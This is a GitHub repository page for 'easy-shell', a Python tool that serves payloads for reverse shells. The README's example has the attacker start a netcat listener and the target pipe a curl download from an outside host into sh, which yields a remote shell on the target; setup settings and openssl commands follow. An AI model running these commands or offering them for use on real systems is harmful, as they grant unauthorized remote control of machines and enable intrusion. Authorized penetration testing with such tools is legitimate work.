Dark Mode

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

cristianzsh/easy-shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

3 Commits

Repository files navigation

easy-shell

A pure Python script to easily get a reverse shell.

How it works?

After sending a request, it generates a payload with different commands available to get a reverse shell (python, perl, awk, and more).

Example

Attacker machine
$ whoami
attacker

$ nc -l 8080
sh-4.4$ whoami
centos
sh-4.4$ pwd
/home/centos
Target machine
$ whoami
target

$ curl http://easy-shell.xyz/192.168.0.52:8080 | sh

Running the server

Edit the following lines on easy_shell.py according to your needs:

PORT = 8080
DOMAIN = "http://127.0.0.1:{}".format(str(PORT))

HTTPS = False
KEY_FILE = "keyfile.key"
CERT_FILE = "certfile.cert"

If you want to run it over HTTPS, execute the following commands:

$ openssl genrsa 2048 > keyfile.key && chmod 400 keyfile.key
$ openssl req -new -x509 -nodes -sha256 -days 365 -key keyfile.key -out certfile.cert

Used modules

License

This project is licensed under the 3-Clause BSD License.

About

A pure Python script to easily get a reverse shell

Topics

Resources

Readme

License

BSD-3-Clause license

Stars

Watchers

Forks

Contributors

Languages